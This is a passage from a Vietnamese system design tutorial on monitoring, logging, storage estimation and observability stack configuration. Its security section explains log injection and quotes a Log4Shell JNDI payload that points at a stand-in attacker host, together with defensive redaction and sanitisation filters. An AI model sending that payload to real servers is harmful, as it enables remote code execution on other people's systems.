2.12.4 Ví dụ thực tế: Pixie auto-tracing

# Install Pixie on K8s cluster
px deploy
 
# Run pre-built scripts (no code change needed)
px run px/http_data
# → Sees ALL HTTP requests in cluster, including method, path, latency, status
 
px run px/mysql_data
# → Sees ALL MySQL queries with timings
 
px run px/dns
# → Sees DNS resolution latency

Magic: Không có instrumentation code nào. Pixie attach eBPF probes vào kernel → intercept syscalls → reconstruct application protocols (HTTP, gRPC, MySQL, Redis…).

2.12.5 Continuous Profiling với Parca/Pyroscope

Profiling truyền thống chỉ chạy on-demand (perf, pprof). Continuous profiling capture profile mọi thời điểm với negligible overhead.

Always-on profile → flame graph → identify CPU hotspots, memory leaks, lock contention
                                  ở mức code line, no extra instrumentation

Use case:

Tìm CPU hotspot ở production (1% function chiếm 30% CPU)
Phát hiện memory leak (function X đang giữ bộ nhớ tăng dần)
Debug performance regression sau deploy (compare profile pre/post)

Tham chiếu:

Brendan Gregg, BPF Performance Tools (O’Reilly 2019) — bible của eBPF observability
Liz Rice, Learning eBPF (O’Reilly 2023) — beginner-friendly
Cilium documentation: https://docs.cilium.io/

2.12.6 Khi nào dùng eBPF vs Application Instrumentation?

Need business-level metrics (revenue, user_id, feature_flag)?
├─ YES → Application instrumentation (OpenTelemetry SDK)
└─ NO  → Need infrastructure/network visibility?
         ├─ YES → eBPF (Pixie, Cilium Hubble, Parca)
         └─ Both → Use complementary

Best practice 2024-2026 stack:

OpenTelemetry SDK — application traces với business attributes
Prometheus — infrastructure metrics (CPU, memory, network)
eBPF observability (Pixie/Hubble) — kernel/network deep dive
Continuous profiling (Parca/Pyroscope) — code-level performance
Structured events backend (Honeycomb, ClickHouse) — high-cardinality drill-down

3. Estimation — Ước lượng Storage cho Monitoring Stack

3.1 Metrics Storage (TSDB Sizing)

Assumptions:

Thông số	Giá trị
Số services	50
Metrics per service	200 (avg, bao gồm custom + runtime + infra)
Unique label combinations per metric	10 (avg)
Scrape interval	15 giây
Bytes per sample	16 bytes (timestamp 8B + value 8B)
Retention	30 ngày
Compression ratio	1.37 bytes/sample (sau compression, Prometheus real-world)

Tổng số time series:

T o t a l S er i es = S er v i ces \times M e t r i cs / S er v i ce \times L ab e l s / M e t r i c

= 50 \times 200 \times 10 = 100, 000 ser i es

Samples per day:

S am pl es / d a y = T o t a l S er i es \times \frac{86 , 400}{S cr a p e I n t er v a l}

= 100, 000 \times \frac{86 , 400}{15} = 100, 000 \times 5, 760 = 576, 000, 000 s am pl es / d a y

Storage per day (sau compression):

St or a g e / d a y = S am pl es / d a y \times B y t es / s am pl e_{co m p resse d}

= 576 M \times 1.37 b y t es = 789, 120, 000 b y t es \approx 789 MB / d a y \approx 0.77 GB / d a y

Storage cho 30 ngày retention:

St or a g e_{30 d} = 0.77 GB \times 30 = 23.1 GB

Nhận xét: 100K series, 30 ngày retention → chỉ cần ~25GB. Prometheus single node hoàn toàn handle được. Nhưng nếu cardinality explosion lên 10M series → 2.3TB/30d → cần Thanos/Cortex/Mimir cho long-term storage.

3.2 Log Storage Sizing

Assumptions:

Thông số	Giá trị
Tổng QPS (tất cả services)	10,000 req/s
Log lines per request	5 (avg: access log, app log, DB query log, etc.)
Average log line size	500 bytes (structured JSON)
Retention	90 ngày
Elasticsearch index overhead	10% (inverted index, doc values)

Log volume per day:

L o g l in es / d a y = QPS \times L o g l in es / re q u es t \times 86, 400

= 10, 000 \times 5 \times 86, 400 = 4, 320, 000, 000 = 4.32 B l in es / d a y

R a w l o g v o l u m e / d a y = 4.32 B \times 500 b y t es = 2, 160 GB / d a y \approx 2.16 TB / d a y

Sau Elasticsearch compression (~70% ratio, thực tế):

ES s t or a g e / d a y = 2.16 TB \times 0.3 + 10% in d e x o v er h e a d = 0.648 TB \times 1.1 \approx 0.71 TB / d a y

Storage cho 90 ngày retention:

St or a g e_{90 d} = 0.71 TB \times 90 = 63.9 TB

Nhận xét: 10K QPS → cần ~64TB Elasticsearch storage cho 90 ngày. Đây là lý do:

Log sampling cần thiết (không log 100% requests)

Log levels quan trọng (production chỉ nên log WARN+ normally, DEBUG khi cần)

Hot/Warm/Cold architecture trong Elasticsearch (SSD cho 7d, HDD cho 90d, S3 cho archive)

Loki rẻ hơn vì không full-text index

3.3 Alert Threshold Calculation

Ví dụ: Tính threshold cho error rate alert dựa trên SLO

Assumptions:

SLO: 99.9% availability (30 ngày)
Error budget: 0.1% = 43.2 phút downtime / tháng

M a x a ll o w e d error r a t e = 1 - S L O = 0.1%

Burn rate thresholds:

Alert	Burn Rate	Error Rate Threshold	Window
P1	14.4x	$0.1% \times 14.4 = 1.44%$	5 phút
P2	6x	$0.1% \times 6 = 0.6%$	30 phút
P3	1x	$0.1% \times 1 = 0.1%$	6 giờ

Latency threshold calculation:

Nếu SLO: 99% requests < 200ms (P99 latency target):

S L I = \frac{re q u es t s w i t h l a t e n cy < 200 m s}{t o t a l re q u es t s}

E rror b u d g e t = 1 - 0.99 = 1%

Alert khi burn rate > 14.4x:

T r i gg er w h e n : \frac{re q u es t s w i t h l a t e n cy \geq 200 m s}{t o t a l re q u es t s} > 1% \times 14.4 = 14.4%

→ Alert khi hơn 14.4% requests chậm hơn 200ms trong window 5 phút.

4. Security — Bảo mật trong Monitoring & Logging

4.1 Log Injection Attacks

Mô tả: Attacker chèn malicious content vào input, input đó được log, và khi admin xem log trong Kibana/web UI → trigger XSS hoặc làm sai lệch log.

Ví dụ tấn công:

# Attacker gửi username:
username = "admin\n2024-01-15 10:30:45 INFO Login successful user=admin role=superadmin"

# Trong plaintext log, dòng giả xuất hiện như log thật:
2024-01-15 10:30:45 ERROR Login failed user=admin
2024-01-15 10:30:45 INFO Login successful user=admin role=superadmin  ← FAKE!

Log4Shell (CVE-2021-44228) — một trong những vulnerabilities nghiêm trọng nhất lịch sử:

# Attacker gửi header:
User-Agent: ${jndi:ldap://attacker.com/exploit}

# Log4j resolve JNDI lookup → download + execute malicious code
# → Remote Code Execution (RCE) trên server

Phòng chống:

Biện pháp	Chi tiết
Structured logging	Dùng JSON — field values được escape tự động, không thể inject newlines
Input sanitization	Strip control characters (`\n`, `\r`, `\t`) trước khi log
Parameterized logging	`logger.info("Login failed", {"user": user_input})` thay vì `logger.info(f"Login failed user={user_input}")`
Update dependencies	Log4j >= 2.17.1, patch JNDI lookup
Output encoding	Kibana/Grafana Loki auto-escape HTML, nhưng custom dashboards cần encode

4.2 PII (Personally Identifiable Information) in Logs

Vấn đề: Logs chứa PII vi phạm GDPR, CCPA, PDPA (VN). Ví dụ:

{
  "message": "Payment processed",
  "user_email": "[email protected]",
  "credit_card": "4111-1111-1111-1111",
  "ip_address": "113.160.234.56",
  "phone": "+84901234567"
}

Giải pháp multi-layer:

Layer	Technique	Ví dụ
Application	Redact/mask tại source code	`credit_card: "****1111"`
Pipeline	Logstash/Fluentd filter	`mutate { gsub => ["message", "\d{4}-\d{4}-\d{4}-\d{4}", "**REDACTED**"] }`
Storage	Field-level encryption trong ES	Encrypt `user_email` field
Access	RBAC trên Kibana	Chỉ Security team thấy full PII
Retention	Auto-delete PII sau 30 ngày	ILM policy trong Elasticsearch

Logstash PII Filter Example:

filter {
  # Mask credit card numbers
  mutate {
    gsub => [
      "message", "\b\d{4}[-\s]?\d{4}[-\s]?\d{4}[-\s]?\d{4}\b", "[CARD_REDACTED]",
      "message", "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b", "[EMAIL_REDACTED]",
      "message", "\b\d{3}[-.]?\d{3}[-.]?\d{4}\b", "[PHONE_REDACTED]"
    ]
  }
 
  # Remove sensitive fields entirely
  mutate {
    remove_field => ["password", "secret", "token", "authorization"]
  }
}

4.3 Secure Log Transport

Risk	Mitigation
Eavesdropping (nghe lén log in transit)	TLS 1.3 cho mọi log shipping (Filebeat → Logstash, Logstash → ES)
Tampering (sửa log)	Digital signature / HMAC cho log entries; Append-only storage
Log forging (tạo log giả)	Mutual TLS (mTLS) giữa log shipper và collector — chỉ trusted agents gửi log
Replay attack	Timestamp + nonce trong log entries

Filebeat TLS config:

output.logstash:
  hosts: ["logstash.internal:5044"]
  ssl.enabled: true
  ssl.certificate_authorities: ["/etc/pki/ca.crt"]
  ssl.certificate: "/etc/pki/filebeat.crt"
  ssl.key: "/etc/pki/filebeat.key"
  ssl.verification_mode: "full"  # Verify server cert

4.4 Access Control for Monitoring Dashboards

Monitoring dashboards chứa thông tin cực kỳ nhạy cảm: architecture, traffic patterns, error details, internal endpoints. Nếu bị leak → attacker có blueprint của hệ thống.

Control	Implementation
Authentication	SSO (SAML/OIDC) cho Grafana/Kibana — KHÔNG dùng default admin/admin
Authorization (RBAC)	Grafana: Viewer/Editor/Admin per org. Kibana: Spaces + Roles
Network	Dashboard chỉ accessible qua VPN hoặc internal network
Audit	Log mọi dashboard access, query execution, alert changes
Data masking	Dashboard cho non-security team không hiển thị IP, user_id chi tiết

4.5 Audit Trail for Monitoring Changes

Mọi thay đổi trong monitoring system phải được audit:

Action	Audit Record
Alert rule created/modified/deleted	Who, when, old value → new value
Dashboard modified	Git-based provisioning (Grafana as Code)
Silence/inhibit created	Who silenced, duration, reason
Log retention policy changed	Approval workflow required
Access granted to monitoring	RBAC change log

Compliance requirement: SOC 2, PCI-DSS, HIPAA đều yêu cầu audit trail cho monitoring system changes. Nếu ai đó silence critical alert rồi thực hiện attack → audit trail là evidence.

5. DevOps — Full Monitoring Stack Setup

5.1 Prometheus + Grafana + Alertmanager Stack

docker-compose-monitoring.yml:

version: "3.8"
 
networks:
  monitoring:
    driver: bridge
 
volumes:
  prometheus_data: {}
  grafana_data: {}
  alertmanager_data: {}
 
services:
  # ============================================================
  # PROMETHEUS - Metrics Collection & Storage
  # ============================================================
  prometheus:
    image: prom/prometheus:v2.50.0
    container_name: prometheus
    restart: unless-stopped
    ports:
      - "9090:9090"
    volumes:
      - ./prometheus/prometheus.yml:/etc/prometheus/prometheus.yml:ro
      - ./prometheus/alert-rules.yml:/etc/prometheus/alert-rules.yml:ro
      - prometheus_data:/prometheus
    command:
      - "--config.file=/etc/prometheus/prometheus.yml"
      - "--storage.tsdb.path=/prometheus"
      - "--storage.tsdb.retention.time=30d"
      - "--storage.tsdb.retention.size=50GB"
      - "--web.enable-lifecycle"          # Enable /-/reload endpoint
      - "--web.enable-admin-api"          # Enable admin API (careful in prod!)
      - "--storage.tsdb.min-block-duration=2h"
      - "--storage.tsdb.max-block-duration=2h"
    networks:
      - monitoring
    deploy:
      resources:
        limits:
          memory: 4G
          cpus: "2"
 
  # ============================================================
  # ALERTMANAGER - Alert Routing & Notification
  # ============================================================
  alertmanager:
    image: prom/alertmanager:v0.27.0
    container_name: alertmanager
    restart: unless-stopped
    ports:
      - "9093:9093"
    volumes:
      - ./alertmanager/alertmanager.yml:/etc/alertmanager/alertmanager.yml:ro
      - alertmanager_data:/alertmanager
    command:
      - "--config.file=/etc/alertmanager/alertmanager.yml"
      - "--storage.path=/alertmanager"
      - "--cluster.advertise-address=0.0.0.0:9093"
    networks:
      - monitoring
 
  # ============================================================
  # GRAFANA - Visualization & Dashboards
  # ============================================================
  grafana:
    image: grafana/grafana:10.3.0
    container_name: grafana
    restart: unless-stopped
    ports:
      - "3000:3000"
    environment:
      - GF_SECURITY_ADMIN_USER=admin
      - GF_SECURITY_ADMIN_PASSWORD=${GRAFANA_ADMIN_PASSWORD:-changeme}
      - GF_USERS_ALLOW_SIGN_UP=false
      - GF_AUTH_ANONYMOUS_ENABLED=false
      - GF_SERVER_ROOT_URL=https://grafana.example.com
      - GF_SMTP_ENABLED=true
      - GF_SMTP_HOST=smtp.gmail.com:587
      - GF_LOG_LEVEL=warn
    volumes:
      - grafana_data:/var/lib/grafana
      - ./grafana/provisioning/datasources:/etc/grafana/provisioning/datasources:ro
      - ./grafana/provisioning/dashboards:/etc/grafana/provisioning/dashboards:ro
      - ./grafana/dashboards:/var/lib/grafana/dashboards:ro
    networks:
      - monitoring
 
  # ============================================================
  # NODE EXPORTER - Host Metrics (CPU, Memory, Disk, Network)
  # ============================================================
  node-exporter:
    image: prom/node-exporter:v1.7.0
    container_name: node-exporter
    restart: unless-stopped
    ports:
      - "9100:9100"
    volumes:
      - /proc:/host/proc:ro
      - /sys:/host/sys:ro
      - /:/rootfs:ro
    command:
      - "--path.procfs=/host/proc"
      - "--path.rootfs=/rootfs"
      - "--path.sysfs=/host/sys"
      - "--collector.filesystem.mount-points-exclude=^/(sys|proc|dev|host|etc)($$|/)"
    networks:
      - monitoring
 
  # ============================================================
  # cADVISOR - Container Metrics
  # ============================================================
  cadvisor:
    image: gcr.io/cadvisor/cadvisor:v0.49.1
    container_name: cadvisor
    restart: unless-stopped
    ports:
      - "8080:8080"
    volumes:
      - /:/rootfs:ro
      - /var/run:/var/run:ro
      - /sys:/sys:ro
      - /var/lib/docker/:/var/lib/docker:ro
      - /dev/disk/:/dev/disk:ro
    privileged: true
    devices:
      - /dev/kmsg:/dev/kmsg
    networks:
      - monitoring

prometheus/prometheus.yml:

global:
  scrape_interval: 15s          # Default scrape interval
  evaluation_interval: 15s      # Rule evaluation interval
  scrape_timeout: 10s
 
# Alertmanager configuration
alerting:
  alertmanagers:
    - static_configs:
        - targets:
            - alertmanager:9093
 
# Load alert rules
rule_files:
  - "alert-rules.yml"
 
# Scrape targets
scrape_configs:
  # Prometheus self-monitoring
  - job_name: "prometheus"
    static_configs:
      - targets: ["localhost:9090"]
 
  # Node Exporter (host metrics)
  - job_name: "node-exporter"
    static_configs:
      - targets: ["node-exporter:9100"]
 
  # cAdvisor (container metrics)
  - job_name: "cadvisor"
    static_configs:
      - targets: ["cadvisor:8080"]
 
  # Application services (example)
  - job_name: "app-services"
    metrics_path: "/metrics"
    scrape_interval: 10s
    static_configs:
      - targets:
          - "api-gateway:8080"
          - "user-service:8081"
          - "payment-service:8082"
          - "order-service:8083"
        labels:
          env: "production"
 
  # Kubernetes service discovery (khi dùng k8s)
  # - job_name: "kubernetes-pods"
  #   kubernetes_sd_configs:
  #     - role: pod
  #   relabel_configs:
  #     - source_labels: [__meta_kubernetes_pod_annotation_prometheus_io_scrape]
  #       action: keep
  #       regex: true
  #     - source_labels: [__meta_kubernetes_pod_annotation_prometheus_io_path]
  #       action: replace
  #       target_label: __metrics_path__
  #       regex: (.+)

alertmanager/alertmanager.yml:

global:
  resolve_timeout: 5m
  smtp_from: "[email protected]"
  smtp_smarthost: "smtp.gmail.com:587"
  smtp_auth_username: "[email protected]"
  smtp_auth_password: "${SMTP_PASSWORD}"
  smtp_require_tls: true
 
# Notification templates
templates:
  - "/etc/alertmanager/templates/*.tmpl"
 
# Alert routing tree
route:
  receiver: "slack-default"
  group_by: ["alertname", "severity", "service"]
  group_wait: 30s           # Wait before sending first notification
  group_interval: 5m        # Wait between grouped notifications
  repeat_interval: 4h       # Repeat if not resolved
 
  routes:
    # P1 Critical → PagerDuty + Slack
    - match:
        severity: critical
      receiver: "pagerduty-critical"
      group_wait: 10s
      repeat_interval: 1h
      continue: true       # Also send to next matching route
 
    - match:
        severity: critical
      receiver: "slack-critical"
 
    # P2 High → Slack #incidents
    - match:
        severity: high
      receiver: "slack-incidents"
      repeat_interval: 2h
 
    # P3 Warning → Slack #alerts
    - match:
        severity: warning
      receiver: "slack-alerts"
      repeat_interval: 8h
 
    # Security alerts → Security team
    - match:
        category: security
      receiver: "security-team"
      group_wait: 0s
      repeat_interval: 30m
 
# Inhibition rules (suppress lower severity when higher fires)
inhibit_rules:
  - source_match:
      severity: "critical"
    target_match:
      severity: "warning"
    equal: ["alertname", "service"]
 
  - source_match:
      severity: "critical"
    target_match:
      severity: "high"
    equal: ["alertname", "service"]
 
# Receivers
receivers:
  - name: "slack-default"
    slack_configs:
      - api_url: "${SLACK_WEBHOOK_DEFAULT}"
        channel: "#monitoring"
        title: '[{{ .Status | toUpper }}] {{ .GroupLabels.alertname }}'
        text: '{{ range .Alerts }}*{{ .Annotations.summary }}*\n{{ .Annotations.description }}\n{{ end }}'
        send_resolved: true
 
  - name: "slack-critical"
    slack_configs:
      - api_url: "${SLACK_WEBHOOK_CRITICAL}"
        channel: "#incidents"
        title: '🚨 CRITICAL: {{ .GroupLabels.alertname }}'
        text: >-
          {{ range .Alerts }}
          *Service*: {{ .Labels.service }}
          *Summary*: {{ .Annotations.summary }}
          *Runbook*: {{ .Annotations.runbook_url }}
          {{ end }}
        send_resolved: true
 
  - name: "slack-incidents"
    slack_configs:
      - api_url: "${SLACK_WEBHOOK_INCIDENTS}"
        channel: "#incidents"
        send_resolved: true
 
  - name: "slack-alerts"
    slack_configs:
      - api_url: "${SLACK_WEBHOOK_ALERTS}"
        channel: "#alerts"
        send_resolved: true
 
  - name: "pagerduty-critical"
    pagerduty_configs:
      - service_key: "${PAGERDUTY_SERVICE_KEY}"
        severity: critical
        description: '{{ .GroupLabels.alertname }}: {{ .CommonAnnotations.summary }}'
        details:
          service: '{{ .GroupLabels.service }}'
          severity: '{{ .GroupLabels.severity }}'
          runbook: '{{ .CommonAnnotations.runbook_url }}'
 
  - name: "security-team"
    slack_configs:
      - api_url: "${SLACK_WEBHOOK_SECURITY}"
        channel: "#security-alerts"
    pagerduty_configs:
      - service_key: "${PAGERDUTY_SECURITY_KEY}"
        severity: critical

5.2 ELK Stack Docker Compose

docker-compose-elk.yml:

version: "3.8"
 
networks:
  elk:
    driver: bridge
 
volumes:
  elasticsearch_data: {}
  logstash_pipeline: {}
 
services:
  # ============================================================
  # ELASTICSEARCH - Log Storage & Search Engine
  # ============================================================
  elasticsearch:
    image: docker.elastic.co/elasticsearch/elasticsearch:8.12.0
    container_name: elasticsearch
    restart: unless-stopped
    environment:
      - discovery.type=single-node
      - cluster.name=monitoring-cluster
      - bootstrap.memory_lock=true
      - "ES_JAVA_OPTS=-Xms2g -Xmx2g"
      - xpack.security.enabled=true
      - xpack.security.enrollment.enabled=true
      - ELASTIC_PASSWORD=${ELASTIC_PASSWORD:-changeme}
      # ILM (Index Lifecycle Management) for log rotation
      - xpack.monitoring.collection.enabled=true
    ulimits:
      memlock:
        soft: -1
        hard: -1
    volumes:
      - elasticsearch_data:/usr/share/elasticsearch/data
    ports:
      - "9200:9200"
    networks:
      - elk
    deploy:
      resources:
        limits:
          memory: 4G
 
  # ============================================================
  # LOGSTASH - Log Processing Pipeline
  # ============================================================
  logstash:
    image: docker.elastic.co/logstash/logstash:8.12.0
    container_name: logstash
    restart: unless-stopped
    volumes:
      - ./logstash/pipeline/logstash.conf:/usr/share/logstash/pipeline/logstash.conf:ro
      - ./logstash/config/logstash.yml:/usr/share/logstash/config/logstash.yml:ro
    ports:
      - "5044:5044"    # Beats input
      - "5000:5000"    # TCP input (for direct log shipping)
      - "9600:9600"    # Monitoring API
    environment:
      - "LS_JAVA_OPTS=-Xms1g -Xmx1g"
    depends_on:
      - elasticsearch
    networks:
      - elk
 
  # ============================================================
  # KIBANA - Log Visualization
  # ============================================================
  kibana:
    image: docker.elastic.co/kibana/kibana:8.12.0
    container_name: kibana
    restart: unless-stopped
    environment:
      - ELASTICSEARCH_HOSTS=http://elasticsearch:9200
      - ELASTICSEARCH_USERNAME=kibana_system
      - ELASTICSEARCH_PASSWORD=${KIBANA_PASSWORD:-changeme}
      - xpack.security.enabled=true
      - xpack.encryptedSavedObjects.encryptionKey=${KIBANA_ENCRYPTION_KEY}
    ports:
      - "5601:5601"
    depends_on:
      - elasticsearch
    networks:
      - elk
 
  # ============================================================
  # FILEBEAT - Log Shipper (chạy trên mỗi host)
  # ============================================================
  filebeat:
    image: docker.elastic.co/beats/filebeat:8.12.0
    container_name: filebeat
    restart: unless-stopped
    user: root
    volumes:
      - ./filebeat/filebeat.yml:/usr/share/filebeat/filebeat.yml:ro
      - /var/lib/docker/containers:/var/lib/docker/containers:ro
      - /var/log:/var/log:ro
    depends_on:
      - logstash
    networks:
      - elk

logstash/pipeline/logstash.conf:

input {
  beats {
    port => 5044
    ssl => true
    ssl_certificate_authorities => ["/etc/pki/ca.crt"]
    ssl_certificate => "/etc/pki/logstash.crt"
    ssl_key => "/etc/pki/logstash.key"
    ssl_verify_mode => "force_peer"
  }
 
  tcp {
    port => 5000
    codec => json_lines
  }
}
 
filter {
  # ============================
  # Parse JSON logs
  # ============================
  if [message] =~ /^\{/ {
    json {
      source => "message"
      target => "parsed"
    }
    mutate {
      rename => {
        "[parsed][level]" => "log_level"
        "[parsed][service]" => "service_name"
        "[parsed][trace_id]" => "trace_id"
        "[parsed][span_id]" => "span_id"
        "[parsed][duration_ms]" => "duration_ms"
      }
    }
  }
 
  # ============================
  # PII Redaction (CRITICAL!)
  # ============================
  mutate {
    gsub => [
      # Credit card numbers
      "message", "\b\d{4}[-\s]?\d{4}[-\s]?\d{4}[-\s]?\d{4}\b", "[CARD_REDACTED]",
      # Email addresses
      "message", "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b", "[EMAIL_REDACTED]",
      # Vietnamese phone numbers
      "message", "\b(0|\+84)\d{9,10}\b", "[PHONE_REDACTED]",
      # SSN-like patterns
      "message", "\b\d{3}-\d{2}-\d{4}\b", "[SSN_REDACTED]"
    ]
  }
 
  # Remove explicitly sensitive fields
  mutate {
    remove_field => ["password", "secret", "token", "authorization", "cookie",
                     "[parsed][password]", "[parsed][secret]", "[parsed][token]"]
  }
 
  # ============================
  # Enrich with geo data (optional)
  # ============================
  if [client_ip] {
    geoip {
      source => "client_ip"
      target => "geo"
    }
  }
 
  # ============================
  # Log injection protection
  # ============================
  mutate {
    gsub => [
      # Remove ANSI escape codes
      "message", "\e\[[0-9;]*m", "",
      # Remove null bytes
      "message", "\x00", ""
    ]
  }
 
  # ============================
  # Add metadata
  # ============================
  mutate {
    add_field => {
      "environment" => "${ENV:production}"
      "pipeline_version" => "2.0"
    }
  }
}
 
output {
  elasticsearch {
    hosts => ["elasticsearch:9200"]
    user => "elastic"
    password => "${ELASTIC_PASSWORD}"
    ssl => true
    index => "logs-%{[service_name]}-%{+YYYY.MM.dd}"
    ilm_enabled => true
    ilm_rollover_alias => "logs"
    ilm_policy => "logs-lifecycle"
  }
 
  # Debug output (disable in production)
  # stdout { codec => rubydebug }
}

5.3 OpenTelemetry Collector Configuration

otel-collector-config.yml:

receivers:
  # OTLP receiver (gRPC + HTTP)
  otlp:
    protocols:
      grpc:
        endpoint: 0.0.0.0:4317
      http:
        endpoint: 0.0.0.0:4318
        cors:
          allowed_origins: ["*"]
 
  # Prometheus receiver (scrape Prometheus-format metrics)
  prometheus:
    config:
      scrape_configs:
        - job_name: "otel-collector"
          scrape_interval: 15s
          static_configs:
            - targets: ["localhost:8888"]
 
  # Host metrics receiver
  hostmetrics:
    collection_interval: 30s
    scrapers:
      cpu: {}
      memory: {}
      disk: {}
      network: {}
      load: {}
 
processors:
  # Batch processor (buffer before export)
  batch:
    timeout: 5s
    send_batch_size: 1024
    send_batch_max_size: 2048
 
  # Memory limiter (prevent OOM)
  memory_limiter:
    check_interval: 1s
    limit_mib: 1024
    spike_limit_mib: 256
 
  # Attributes processor (add common attributes)
  attributes:
    actions:
      - key: environment
        value: "production"
        action: upsert
      - key: deployment.version
        value: "v2.1.0"
        action: upsert
 
  # Filter processor (drop noisy/unwanted telemetry)
  filter:
    error_mode: ignore
    traces:
      span:
        - 'attributes["http.target"] == "/health"'
        - 'attributes["http.target"] == "/metrics"'
        - 'attributes["http.target"] == "/readyz"'
 
  # Tail sampling (keep interesting traces, sample boring ones)
  tail_sampling:
    decision_wait: 10s
    num_traces: 50000
    expected_new_traces_per_sec: 1000
    policies:
      # Always keep error traces
      - name: errors-policy
        type: status_code
        status_code: {status_codes: [ERROR]}
      # Always keep slow traces (> 1s)
      - name: latency-policy
        type: latency
        latency: {threshold_ms: 1000}
      # Sample 10% of successful traces
      - name: probabilistic-policy
        type: probabilistic
        probabilistic: {sampling_percentage: 10}
 
exporters:
  # Export traces to Jaeger
  otlp/jaeger:
    endpoint: jaeger:4317
    tls:
      insecure: true
 
  # Export metrics to Prometheus
  prometheus:
    endpoint: 0.0.0.0:8889
    resource_to_telemetry_conversion:
      enabled: true
 
  # Export logs to Loki
  loki:
    endpoint: http://loki:3100/loki/api/v1/push
    default_labels_enabled:
      exporter: true
      job: true
 
  # Debug exporter (development only)
  # debug:
  #   verbosity: detailed
 
extensions:
  health_check:
    endpoint: 0.0.0.0:13133
  zpages:
    endpoint: 0.0.0.0:55679
 
service:
  extensions: [health_check, zpages]
  pipelines:
    traces:
      receivers: [otlp]
      processors: [memory_limiter, filter, tail_sampling, batch, attributes]
      exporters: [otlp/jaeger]
    metrics:
      receivers: [otlp, prometheus, hostmetrics]
      processors: [memory_limiter, batch, attributes]
      exporters: [prometheus]
    logs:
      receivers: [otlp]
      processors: [memory_limiter, batch, attributes]
      exporters: [loki]
 
  telemetry:
    logs:
      level: info
    metrics:
      address: 0.0.0.0:8888

5.4 Grafana Dashboard Provisioning

grafana/provisioning/datasources/datasources.yml:

apiVersion: 1
datasources:
  - name: Prometheus
    type: prometheus
    access: proxy
    url: http://prometheus:9090
    isDefault: true
    editable: false
 
  - name: Elasticsearch
    type: elasticsearch
    access: proxy
    url: http://elasticsearch:9200
    database: "logs-*"
    basicAuth: true
    basicAuthUser: "grafana_reader"
    jsonData:
      timeField: "@timestamp"
      esVersion: "8.12.0"
      logMessageField: "message"
      logLevelField: "log_level"
 
  - name: Jaeger
    type: jaeger
    access: proxy
    url: http://jaeger:16686

grafana/provisioning/dashboards/dashboards.yml:

apiVersion: 1
providers:
  - name: "default"
    orgId: 1
    folder: "System Design Mastery"
    type: file
    disableDeletion: false
    editable: true
    options:
      path: /var/lib/grafana/dashboards
      foldersFromFilesStructure: true

Example Grafana Dashboard JSON (Golden Signals):

{
  "dashboard": {
    "title": "Golden Signals - Service Overview",
    "tags": ["golden-signals", "sre", "production"],
    "timezone": "browser",
    "refresh": "10s",
    "time": {"from": "now-1h", "to": "now"},
    "panels": [
      {
        "title": "Request Rate (Traffic)",
        "type": "timeseries",
        "gridPos": {"h": 8, "w": 12, "x": 0, "y": 0},
        "targets": [
          {
            "expr": "sum by (service) (rate(http_requests_total[5m]))",
            "legendFormat": "{{service}}"
          }
        ],
        "fieldConfig": {
          "defaults": {
            "unit": "reqps",
            "thresholds": {
              "steps": [
                {"color": "green", "value": null},
                {"color": "yellow", "value": 2800},
                {"color": "red", "value": 3500}
              ]
            }
          }
        }
      },
      {
        "title": "Error Rate (%)",
        "type": "timeseries",
        "gridPos": {"h": 8, "w": 12, "x": 12, "y": 0},
        "targets": [
          {
            "expr": "sum by (service) (rate(http_requests_total{status=~\"5..\"}[5m])) / sum by (service) (rate(http_requests_total[5m])) * 100",
            "legendFormat": "{{service}}"
          }
        ],
        "fieldConfig": {
          "defaults": {
            "unit": "percent",
            "thresholds": {
              "steps": [
                {"color": "green", "value": null},
                {"color": "yellow", "value": 0.1},
                {"color": "red", "value": 1.0}
              ]
            }
          }
        }
      },
      {
        "title": "P99 Latency",
        "type": "timeseries",
        "gridPos": {"h": 8, "w": 12, "x": 0, "y": 8},
        "targets": [
          {
            "expr": "histogram_quantile(0.99, sum by (le, service) (rate(http_request_duration_seconds_bucket[5m])))",
            "legendFormat": "{{service}} p99"
          },
          {
            "expr": "histogram_quantile(0.50, sum by (le, service) (rate(http_request_duration_seconds_bucket[5m])))",
            "legendFormat": "{{service}} p50"
          }
        ],
        "fieldConfig": {
          "defaults": {
            "unit": "s",
            "thresholds": {
              "steps": [
                {"color": "green", "value": null},
                {"color": "yellow", "value": 0.2},
                {"color": "red", "value": 0.5}
              ]
            }
          }
        }
      },
      {
        "title": "Resource Saturation",
        "type": "gauge",
        "gridPos": {"h": 8, "w": 12, "x": 12, "y": 8},
        "targets": [
          {
            "expr": "100 - (avg by (instance) (rate(node_cpu_seconds_total{mode=\"idle\"}[5m])) * 100)",
            "legendFormat": "CPU {{instance}}"
          },
          {
            "expr": "(1 - node_memory_MemAvailable_bytes / node_memory_MemTotal_bytes) * 100",
            "legendFormat": "Memory {{instance}}"
          }
        ],
        "fieldConfig": {
          "defaults": {
            "unit": "percent",
            "min": 0,
            "max": 100,
            "thresholds": {
              "steps": [
                {"color": "green", "value": null},
                {"color": "yellow", "value": 70},
                {"color": "red", "value": 90}
              ]
            }
          }
        }
      },
      {
        "title": "Error Budget Remaining",
        "type": "stat",
        "gridPos": {"h": 4, "w": 6, "x": 0, "y": 16},
        "targets": [
          {
            "expr": "1 - ((1 - (sum(rate(http_requests_total{status!~\"5..\"}[30d])) / sum(rate(http_requests_total[30d])))) / (1 - 0.999)) ",
            "legendFormat": "Error Budget"
          }
        ],
        "fieldConfig": {
          "defaults": {
            "unit": "percentunit",
            "thresholds": {
              "steps": [
                {"color": "red", "value": null},
                {"color": "yellow", "value": 0.25},
                {"color": "green", "value": 0.50}
              ]
            }
          }
        }
      }
    ]
  }
}

5.5 PagerDuty Integration Summary

┌──────────┐    ┌──────────────┐    ┌───────────┐    ┌──────────┐
│Prometheus │───►│ Alertmanager │───►│ PagerDuty │───►│ On-call  │
│ (fires   │    │ (routes,     │    │           │    │ Engineer │
│  alert)  │    │  groups,     │    │ - Phone   │    │          │
│          │    │  dedup)      │    │ - SMS     │    │ Ack /    │
│          │    │              │    │ - Push    │    │ Resolve  │
└──────────┘    └──────────────┘    │ - Email   │    └──────────┘
                                     │           │
                                     │ Escalation│
                                     │ Policy    │
                                     └───────────┘

Quy trình:

Prometheus evaluates alert rule → fires alert
Alertmanager receives, groups, deduplicates
Alertmanager sends to PagerDuty via Events API v2
PagerDuty creates incident → notifies on-call per escalation policy
Engineer acknowledges → starts investigation
Engineer resolves → PagerDuty updates status
Alertmanager sends resolved → PagerDuty auto-resolves

